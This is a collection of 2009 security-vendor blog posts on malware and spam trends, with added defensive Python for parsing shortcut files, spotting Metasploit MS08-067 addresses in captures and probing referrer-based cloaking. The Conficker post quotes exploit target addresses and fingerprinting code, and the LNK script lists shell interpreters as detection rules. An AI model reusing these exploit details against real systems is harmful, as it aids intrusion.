• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Counting Malware

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

However, our current count is not an absolute number of detected malware files; this can confuse many people. Drivers can be written very specifically, say one driver for one sample, but that’s not very effective. Most drivers are written to generically detect many samples. For example, one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is far higher than the half-million number reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

Initially VirusScan would focus just on true self-replicating viruses, mainly 8-bit (.com/.exe) MS-DOS viruses as well as boot viruses, which were prevalent then–and some still are today. Malware has evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (PE-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware is static Trojans.

There has also been a big shift by the malware authors. The first malware authors were hobbyists, writing to prove it could be done, but today we mainly see malware that’s going after the money–password stealers, etc. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

Chinese Zombie Count Falls but Still Outnumbers Those in U.S.

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast amount of computers that have been controlled by zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

Abusing Shortcut files

Shortcuts, or LNK files, are small binary files which hold the path to an application, sometimes with optional parameters. These files are used for running applications and are placed in folders where they are easy for users to access, such as the Desktop and application launchers. LNK files are also placed within the Startup folder to run automatically upon system boot. This indirect way of running applications is often attractive to malware authors, as shortcuts have not been brought to most users’ attention as a security concern as much as executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files/scripts in several different ways. Here, we introduce some methods we have recently seen:

  1. Create shortcut files linking to malware files
     This is an easy way to launch malware by a user’s actions or upon system reboot. These LNK files are created on the desktop, network shares, and even startup folders. One of the many variants of the Spy-Agent.bw trojan is known to take advantage of shortcuts to run.

  2. Parasitic infection of shortcuts
     We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file to the original path.

     The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs as well as executing the original file, all while running in the background. Ultimately users only see the application which was associated with the shortcut launch, thereby making it much harder for users to notice the infection.

  3. Scripts in the shortcuts
     Shortcuts can often contain scripts for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.

     When users click on these LNK files, the scripts silently create and drop FTP scripts that then download VBS scripts from the FTP servers. The downloaded VBS scripts are then responsible for downloading trojan files.

In the first two cases, shortcuts are just ways of launching malware, whereas in the last case the LNK files are standalone malicious files: no other malicious executable is needed, only a legitimate “cmd.exe”. LNK files of this type can be attached to emails or hosted on websites. This implies that we need to be more careful with LNK files. Users can easily check shortcuts by browsing the file properties or viewing the file with a binary editor.
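Checking a shortcut in a binary editor can be automated: the target and the arguments sit at fixed places in the Shell Link format, so a parser can pull them out and apply the two rules the cases above suggest, an interpreter such as cmd.exe carrying a command in its arguments (case 3), and a second program path hidden in the arguments (the Mokaksu layout of case 2). The script below is an added example, not Avert Labs code. It reads the 0x4C-byte header and LinkFlags, skips the LinkTargetIDList, takes LocalBasePath from the LinkInfo block, and then reads the StringData fields in their fixed order; `build_lnk()` makes constructed sample shortcuts for the demonstration, with made-up paths and no real malware.

```python
"""
Shortcut (.lnk) parser and triage.  Added example, not Avert Labs code.
Follows the Shell Link binary layout: ShellLinkHeader (0x4C bytes),
optional LinkTargetIDList, optional LinkInfo (carries LocalBasePath),
then StringData (name, relative path, working dir, arguments, icon).
"""
import ntpath
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon"))
INTERPRETERS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
PROGRAM_IN_ARGS = re.compile(r"(?i)\S+\.(?:exe|scr|com|bat|cmd|vbs|js)\b")


def _string_data(s):
    """StringData field: 16-bit character count followed by UTF-16LE text."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(local_base_path, arguments=""):
    """Constructed minimal shortcut: header + LinkInfo(LocalBasePath) + optional arguments."""
    flags = HAS_LINKINFO | IS_UNICODE | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)     # times/size zero, SW_SHOWNORMAL
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty label
    base = local_base_path.encode("latin-1") + b"\x00"
    vol_off = 0x1C                                  # LinkInfo header size
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"         # empty CommonPathSuffix
    return header + link_info + (_string_data(arguments) if arguments else b"")


def parse_lnk(data):
    """Dict with target, arguments and the other StringData fields."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {key: "" for _, key in STRING_FIELDS}
    info["target"] = ""
    pos = 0x4C
    if flags & HAS_IDLIST:                          # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        li_size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                          # VolumeIDAndLocalBasePath
            end = data.index(b"\x00", pos + base_off)
            info["target"] = data[pos + base_off:end].decode("latin-1")
        pos += li_size
    width = 2 if flags & IS_UNICODE else 1
    for flag, key in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            raw = data[pos:pos + count * width]
            info[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    if not info["target"]:
        info["target"] = info["relative_path"]
    return info


def assess_lnk(data):
    """(parsed fields, findings); the findings mirror the abuses in the post."""
    info = parse_lnk(data)
    findings = []
    exe = ntpath.basename(info["target"]).lower()
    if exe in INTERPRETERS and info["arguments"].strip():
        findings.append("interpreter target with inline command")
    if PROGRAM_IN_ARGS.search(info["arguments"]):
        findings.append("program or script path passed as argument")
    return info, findings


if __name__ == "__main__":
    sample = build_lnk(r"C:\Windows\Config.Msi.exe", r'"C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe"')
    print(assess_lnk(sample))
```

Real shortcuts usually carry a LinkTargetIDList and network LinkInfo variants as well; the parser skips the former by size and only reads the local-path form of the latter, which is enough to recover the target for the cases described above.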

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

Mac Trojans Follow Successful Windows Path

It’s been a week since we’ve seen the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports about new Mac Trojans.

Before this we saw mostly lame malware for Mac OSX, but the iWork09 Trojan represents a new element to Mac Trojans — sophistication. This one contains peer to peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

One thing to remember when dealing with pirated software is that you might have a high price to pay, in this case ending up with a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for “McAfee” on torrent sites, you will find a lot with serial numbers; but you won’t know whether the thing is a Trojan version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of Trojan versions of pirated Mac applications.

Take care — you often get what you pay for. ;)

Pay to install free software

I was dealing with customer escalations the other day and came across this interesting sample. If you believed the filename, install_wrar380.exe would install WinRar on your system; for some reason I didn’t believe it ;) .

Upon execution, the installer displays a EULA. I have copied and pasted some of the detail below:

“THE COST OF EACH SMS FROM THE USER’S MOBILE PHONE IS TWO POUNDS. UNLESS OTHERWISE SPECIFIED, THE DOWNLOAD COST SHALL BE FOUR SMS.
Please read these USAGE CONDITIONS carefully and, if appropriate, use the download service which shall imply the express and complete acceptance of each and every one of these USAGE CONDITIONS. Otherwise, please close this website.
Netlink Network Corp. offers a PREMIUM high speed download service that is efficient and virus free. In exchange, the user shall first send two SMS under the conditions specified in clause 2.2 that defines the commercial conditions of the service”

These two sections really caught my eye. From what I understood I was going to be charged £8 in the form of 4 SMS text messages so that I can download WinRar. Alarm bells started to ring.

I clicked ‘I agree’ and was prompted for a code. To get this code, I would have to send 2 SMS text messages to 78*** (Number has been blanked out for security reasons) with the text body ‘CD’ and I would be charged £3 for each text message. This was different to what the EULA said, but as it was cheaper I wasn’t going to argue. Also note how the text is almost the same color as the background to make it difficult to see.

WinRar installer

As I was interested to find out if it really would install WinRar, I went to my local mobile phone store and bought a mobile phone, put £10 on it and sent a text message to the number. To my surprise, I received a text back saying:

“SMS 1/3. Price per SMS: 3 Pounds. Total cost: 9 Pounds.”

It now cost me £9 instead of £6 to download some free software. This was also more than the £8 the EULA said it would cost me. I received a further 2 text messages and the final one was labelled 2/3 even though it was the 3rd. I guess they don’t have QA. You can see the text messages I received below:

SMS 1/3

SMS 2/3

SMS 3/3

I entered the code and clicked on the ‘Install’ button. The software downloaded WinRar and went on to install it for me.

WinRar installer with code

I found the website which the sample came from and it displayed the following text at the bottom of the page:

“This website does not belong to any member´s program. This program should be used based on rules of intellectual property. You may obtain this program for free from the official homepage. Using or applying cracks, serials or keygens is strictly forbidden. This portal will not be held accountable for inappropriate use of the program. Your query has been sent succesfully. You will receive an answer shortly. Thank you for using our services. Due to technical issues, your query could not be sent. We apologize for the inconvenience”.

So they admit that you can download this software for free from its official homepage. They are clearly trying to trick the unsuspecting user to pay for free software.

I thought perhaps they had done this with other free software, so I did some investigating and found several other websites registered to the same company; they offer several other pieces of free software for the small price of £6, or £9 as I found out.

I found installers for Messenger Plus! Live, WinZip, WinAce, 7Zip and several others. All of these can be downloaded for free from their official sites.

Messenger Plus! Live website

The websites are aimed at English, French and Spanish users. Luckily for our European friends, they can pay for the free software in Euros.

While navigating these sites, two different company names kept popping up: Netlink Network Corp and Soletto Group, S.A. I did some quick searching but couldn’t find any details on these companies.

Some of the domains had been registered as recently as late last month, so I believe we are likely to see more pop up.

I pulled all the executables I could find on the websites and added detection as SMSFraud.

Please be on the lookout for these in the future as you don’t want to pay for something which is already free.

The McAfee 2009 Threat Predictions

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Fake antivirus and a real threat

Fake alert malware preys on innocent victims by displaying misleading scan alerts. It tricks the user into buying fake antivirus to fix such falsely exaggerated scan reports. This class of “scareware” depends on extreme social engineering tactics and comes bundled with Backdoors, Password Stealers, Downloaders, Droppers, Browser Helper Objects, etc.

Each of the above classes of malware is used either in the distribution of the fake antivirus itself or in the propagation of other kinds of malware once the fake antivirus is installed on the victim’s machine. Working towards a common goal - extorting money from an innocent victim - these scareware applications have added a new class of malware to their armory: rootkits.

Apart from hiding the scareware’s files, rootkits ensure that access to genuine security vendors’ sites is disabled. The rootkit we noticed, named “tdss[random characters].sys” was blogged about by Computer Associates recently and was associated with the AntiSpywareXP2009 scareware. We, however, noticed that this rootkit was protecting rogue components belonging to WinWebSecurity scareware. This implies that:

  1. The same author of the rootkit is supplying his code to multiple scareware vendors for money, or
  2. The same group is creating and distributing multiple fake antivirus.

McAfee AV will detect and clean this rootkit component from DAT version 5496 onwards. However, a user stuck with a machine that does not have antivirus with updated signatures will have to clean this rootkit manually.

If you are a Windows user, apart from the usual safe computing practices that include using a firewall, an updated Windows operating system and an antivirus software, consider the following steps to minimize the chances of getting infected by such scareware:

  1. Install backup software that can revert your system to a previously known uninfected state
  2. Browse the Internet from sandbox software
  3. Install and browse the Internet from a Virtual Machine

On a final note, the Federal Trade Commission has recently won a restraining order against Innovative Marketing and ByteHosting Internet Services - companies responsible for marketing the scareware applications WinFixer, WinAntivirus, DriveCleaner, ErrorSafe and XP Antivirus. However, we will have to wait to see if this move actually has any impact on curbing the distribution of scareware.

Shrinking Patch Timelines – The Need For HIPS

Over the years, the window between exploit discovery to its incorporation into a worm candidate has shrunk from months, to weeks, to zero-day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their network. Virus authors, on the other hand, have been at the cutting edge for including exploit code in their creations whenever a critical vulnerability is reported. The chart below shows the time frame between a vulnerability being reported and how long it took for virus authors to incorporate it into a worm candidate.

Patch versus Worm Timelines

The year 2007 was the only exception in recent times, with no worm exploiting a critical Microsoft vulnerability.

It’s easy for an outsider to criticize or pass judgment on a network that was hit with a zero-day worm. Spare a thought for the IT administrator; most do not have the flexibility to deploy patches immediately to the network for policy reasons. For example, the organization could be using legacy software, which could break if a new service pack was applied. And keeping these legacy applications running takes precedence over applying the latest Windows hot fixes. Most system administrators, who work in hospitals and other mission critical jobs, don’t have the luxury of doing a Windows update!

To add to these woes, every once in a while a hot fix from Microsoft breaks something in the operating system or adversely affects other applications. Once a patch is rolled out via WSUS (Windows Server Update Service) it cannot be rolled back centrally; a faulty patch from the vendor can prove costly for the organization. For these reasons administrators need more time to deploy these hot fixes in a test environment and QA them properly before deploying them to the enterprise.

So what can an administrator do in these circumstances? Relying solely on mainstream-antivirus desktop protection or firewall-style perimeter protection is insufficient to deal with today’s modern threats. The need of the hour is defense-in-depth. Administrators, who don’t have the luxury of applying patch updates, should seriously consider having a HIPS (host intrusion prevention system) installed on the end point to prevent exploit-based worm infections. Host intrusion prevention systems not only protect systems against zero-day vulnerabilities but also give administrators more time to test and deploy patches. The recent W32/Conficker.worm outbreaks could have been nipped in the bud if more organizations had chosen to protect their systems with HIPS.

Don’t worry, Obama did not refuse to be a president!

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap while using an inadequately protected PC, you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Conficker Worm using Metasploit payload to spread

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated by Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte order conversion of the data in the red box above, we get three addresses, 0x00020408, 0x6f8917c2 and 0x6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from Metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
  {
    'Ret'       => 0x6f88f807,
    'DisableNX' => 0x6f8917c2,
    'Scratch'   => 0x00020408
  }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
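The byte-order conversion described above is easy to automate when triaging a capture. The following Python helper is an added example, not code from the post or from Metasploit: it slides a 4-byte little-endian window over a payload, reports every occurrence of the three addresses from the target entry quoted above, and gives a verdict when all three are present. The payload bytes are constructed for the example (the letters stand in for the rand_text_alpha filler, and the offsets are not those of a real capture); the address table can be extended with other target entries from the module.

```python
import struct
from typing import Dict, Iterator, List, Tuple

# The three addresses of the Metasploit ms08_067_netapi target quoted above. On the
# wire they appear little-endian, which is why the capture shows them byte-reversed.
MSF_XP_SP3_NX_TARGET: Dict[int, str] = {
    0x6f88f807: "Ret (JMP ESI in acgenral.dll)",
    0x6f8917c2: "DisableNX (NX bypass in acgenral.dll)",
    0x00020408: "Scratch",
}


def dwords(payload: bytes) -> Iterator[Tuple[int, int]]:
    """Yield (offset, value) for every 4-byte little-endian window at every byte
    offset, so an address is found whatever alignment the filler text leaves it at."""
    for off in range(len(payload) - 3):
        yield off, struct.unpack_from("<I", payload, off)[0]


def find_msf_addresses(payload: bytes,
                       table: Dict[int, str] = MSF_XP_SP3_NX_TARGET) -> List[Tuple[int, int, str]]:
    """Return (offset, address, label) for each table address present in the payload."""
    return [(off, val, table[val]) for off, val in dwords(payload) if val in table]


def looks_like_msf_ms08_067(payload: bytes, table: Dict[int, str] = MSF_XP_SP3_NX_TARGET) -> bool:
    """Heuristic verdict: every address of the target table occurs in the payload."""
    found = {addr for _, addr, _ in find_msf_addresses(payload, table)}
    return found == set(table)


# Constructed payload (not a real capture): letters stand in for the rand_text_alpha
# filler and the three addresses are packed little-endian, in no particular order.
SAMPLE_PAYLOAD = (
    b"AbCdEfGh"
    + struct.pack("<I", 0x00020408)
    + b"xyz"
    + struct.pack("<I", 0x6f8917c2)
    + struct.pack("<I", 0x6f88f807)
    + b"QqRr"
)

if __name__ == "__main__":
    for off, addr, label in find_msf_addresses(SAMPLE_PAYLOAD):
        print(f"offset {off:3d}: 0x{addr:08x}  {label}")
    print("Metasploit-derived addresses present:", looks_like_msf_ms08_067(SAMPLE_PAYLOAD))
```

Because the scan is byte-granular, the filler length in front of the addresses does not matter; in a real capture, feed the SMB payload bytes of the suspect packet to find_msf_addresses and look at the offsets reported.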

The latest Metasploit exploit, besides covering Windows XP and 2003, also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek, Spanish, Finnish, French, Hebrew, Japanese, Chinese, etc. The ms08_067_netapi exploit module in Metasploit also provides the “smb_fingerprint()” function to detect the Windows version, Service Pack and language of the target OS. This makes programming the worm much easier and can cause a much bigger impact: by using the exploit from the Metasploit module as the code base, a virus/worm programmer only needs to implement the functions for automatic downloading and spreading. We believe this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting the OS version and Service Pack information were embedded into this worm. Hence, without the remote OS language determination ‘feature’, this worm only targets English OS versions at the time of writing.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending an SMB session setup request, it can detect the OS information of the target machine. If the OS is Windows Server 2003, the Service Pack information is also returned.

Since there are a huge number of Windows XP systems, the worm writer obviously did not want to miss out on this pool; the worm therefore determines the Service Pack level by accessing the \SRVSVC named pipe, which is similar to the method used in the Metasploit smb_fingerprint() function:

if (os == 'Windows XP' and sp.length == 0)
  # SRVSVC was blocked in SP2
  begin
    smb_create("\\SRVSVC")
    sp = 'Service Pack 0 / 1'
  rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
    # 0xc0000022 is STATUS_ACCESS_DENIED: the pipe exists but SP2+ refuses the open
    if (e.error_code == 0xc0000022)
      sp = 'Service Pack 2+'
    end
  end
end

So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our signature IDs 3961 and 0x40709d00 respectively. For VirusScan users, DAT update version 5444 has coverage to detect this worm.

McAfee Monthly Spam Report Debuts

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

Rogue LinkedIn Profiles Lead To Malware

LinkedIn is a popular social networking site where you can manage business contacts online. Since you can set up a profile with links to your own website, it seems to attract criminals’ attention as well. A Google search reveals that several hundred fake LinkedIn profiles, from nude “Kirsten Dunst” to nude “Hulk Hogan”, exist already. The rogue profiles all look alike, with a picture of the celebrity and three links to the parts of the “nude video”, as shown in the following picture.

This is exactly the lure - don’t follow these links! The linked websites contain obfuscated script code which decodes to a simple browser redirection. This obfuscated script code is proactively detected by McAfee as “Exploit-IFrame.gen.c” already.

If you’d follow the link (don’t do that!) to see how deep the rabbit hole goes, you will end up at a Traffic Management System like the one described in this Avert Labs blog entry. On every reload the server-side application will point to a different domain.

So when an unsuspecting user is tricked into following the lure, he will end up on different malicious websites trying the classical social-engineering tricks: either the “missing video codec” or a fake AV scan telling the user that his computer is infected with malware and offering a “free” AV scanner, which in fact is the real threat. So beware when following links, even on trusted Web 2.0 platforms like LinkedIn, especially when they promise nude celebrity videos.

Inside The Malicious Traffic Business

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or downloading and installing an executable which pretends to be the missing application needed in order to watch the movie. The animated picture below is such an example: at first glance, it looks like a typical embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins - in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates, and after too many retries you will always be redirected to the homepage of Google. The system remembers your IP address on the server side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which result in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location - just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a French phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer - so let’s say that only visitors with a referrer from Google will be redirected to a malicious web site, as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the website’s owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.
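The practical consequence of these referrer and network-range rules is that a single request from an analyst's workstation proves nothing; the resource has to be requested from several vantage points and with and without a search-engine referrer, and the answers compared. The Python below is an added example, not code from the post or from any traffic management product: SimulatedTDS is a constructed stand-in that implements the rules described above (redirect only with a Google referrer, skip a placeholder “security vendor” range, rotate destinations, park the visitor at Google after too many reloads) so that the probe functions have something to run against offline. All ranges and destinations are placeholders; in real use, fetch would be replaced by a function that performs the HTTP request without following redirects and returns the status and Location header.

```python
import ipaddress
from typing import Callable, Dict, List, Optional, Tuple

Response = Tuple[int, Optional[str]]                # (HTTP status, Location header or None)
Fetcher = Callable[[str, Optional[str]], Response]  # (source IP, Referer) -> Response


class SimulatedTDS:
    """Constructed stand-in for the traffic management rules described above.
    Ranges and destinations are placeholders, not real indicators."""
    AVOID = [ipaddress.ip_network("198.51.100.0/24")]          # ranges the operator never redirects
    DESTINATIONS = ["http://campaign-a.invalid/", "http://campaign-b.invalid/"]
    PARK = "http://www.google.com/"                             # where exhausted visitors are sent
    MAX_HITS = 2                                                # redirects per IP before parking

    def __init__(self) -> None:
        self.seen: Dict[str, int] = {}                          # per-IP reload counter

    def fetch(self, ip: str, referer: Optional[str]) -> Response:
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in self.AVOID):
            return 200, None                 # security vendors get the harmless page
        if not referer or "google." not in referer:
            return 200, None                 # direct visits (the site owner) see nothing odd
        hits = self.seen.get(ip, 0)
        self.seen[ip] = hits + 1
        if hits >= self.MAX_HITS:
            return 302, self.PARK
        return 302, self.DESTINATIONS[hits % len(self.DESTINATIONS)]


def probe_cloaking(fetch: Fetcher, ips: List[str],
                   referers: List[Optional[str]]) -> Dict[Tuple[str, Optional[str]], Optional[str]]:
    """Request the resource under every (source IP, Referer) combination and record
    the redirect target each one receives (None when the response is not a 302)."""
    results: Dict[Tuple[str, Optional[str]], Optional[str]] = {}
    for ip in ips:
        for ref in referers:
            status, location = fetch(ip, ref)
            results[(ip, ref)] = location if status == 302 else None
    return results


def is_cloaked(results: Dict[Tuple[str, Optional[str]], Optional[str]]) -> bool:
    """True when the same resource redirects some visitors but not others."""
    targets = set(results.values())
    return None in targets and len(targets) > 1


def follow_rotation(fetch: Fetcher, ip: str, referer: str, loads: int) -> List[Optional[str]]:
    """Reload from one vantage point and collect the rotating destinations."""
    return [fetch(ip, referer)[1] for _ in range(loads)]


if __name__ == "__main__":
    tds = SimulatedTDS()
    probe = probe_cloaking(tds.fetch, ["203.0.113.5", "198.51.100.9"],
                           [None, "http://www.google.com/search?q=codec"])
    for (ip, ref), target in probe.items():
        print(f"{ip:14s} referer={ref!s:40s} -> {target}")
    print("cloaked:", is_cloaked(probe))
    print("rotation:", follow_rotation(SimulatedTDS().fetch, "203.0.113.7", "http://www.google.com/", 4))
```

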